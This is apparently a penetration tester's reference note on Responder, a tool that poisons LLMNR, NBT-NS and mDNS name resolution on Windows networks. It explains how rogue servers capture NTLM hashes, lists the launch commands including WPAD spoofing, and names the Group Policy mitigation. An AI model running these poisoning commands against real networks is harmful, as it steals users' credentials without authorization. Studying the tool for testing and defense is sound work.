📝 Overview
What it is: A widely used, open-source penetration testing tool developed in Python by SpiderLabs. It functions as a Man-in-the-Middle (MitM) tool designed to target Windows networks by sniffing and poisoning Link-Local Multicast Name Resolution (LLMNR), NBT-NS, and mDNS protocols. Target Phase: Exploitation (Internal Network) Operating System: Linux (Pre-installed on Kali/Parrot)
⚙️ Core Capabilities
- Name Resolution Poisoning: When a Windows machine tries to connect to a server that doesn’t exist (e.g., a user mistypes
\\prnterinstead of\\printer), it broadcasts a request to the entire local network asking, “Does anyone know whereprnteris?“. Responder listens for these broadcasts, instantly replies “That’s me!”, and forces the victim to connect to the attacker’s machine. - Rogue Authentication Servers: Once the victim connects, Responder spins up fake, on-the-fly servers (like a fake SMB share or a fake SQL server) to intercept the authentication attempt.
- Credential Capture: It captures the victim’s NTLMv1/NTLMv2 hashes as they attempt to automatically log into the fake server, saving them locally for offline cracking or relaying.
💻 Common Commands
| Command | Description |
|---|---|
sudo responder -I [interface] | The standard command to start listening and poisoning on a specific network interface (e.g., eth0 or wlan0). |
sudo responder -I eth0 -dw | Starts Responder while enabling WPAD (Web Proxy Auto-Discovery) spoofing, which can catch HTTP authentication requests. |
sudo responder -I eth0 -A | ”Analyze” mode. It will passively listen to the network to see how many LLMNR/NBT-NS requests are flying around without actually poisoning them (stealthier). |
⚠️ Notes & Limitations
- Layer 2 Restriction: This is a massive concept to remember. Responder relies on multicast broadcast traffic. Broadcasts generally do not cross routers. Therefore, your attack machine must be physically or logically on the same local subnet (VLAN) as the victim for the poisoning to work.
- The Fix: Network administrators can easily defeat Responder by disabling LLMNR and NBT-NS across the entire Windows domain via Group Policy (GPO), forcing machines to rely strictly on secure DNS.
The reason this tool is so devastating in a corporate IT environment is because of Windows Single Sign-On (SSO).
When a user tries to access a file share, Windows tries to be helpful. Instead of popping up a password box and annoying the user, Windows automatically takes their current login credentials, hashes them, and throws them at the server behind the scenes.
Responder relies on Windows being too helpful. It tricks the machine into throwing those hashed credentials directly at your Kali laptop.
🔗 Links & Resources
🏷️ Tags
Tools #Responder #MitM #LLMNR #Poisoning #Hash #Exploitation #ActiveDirectory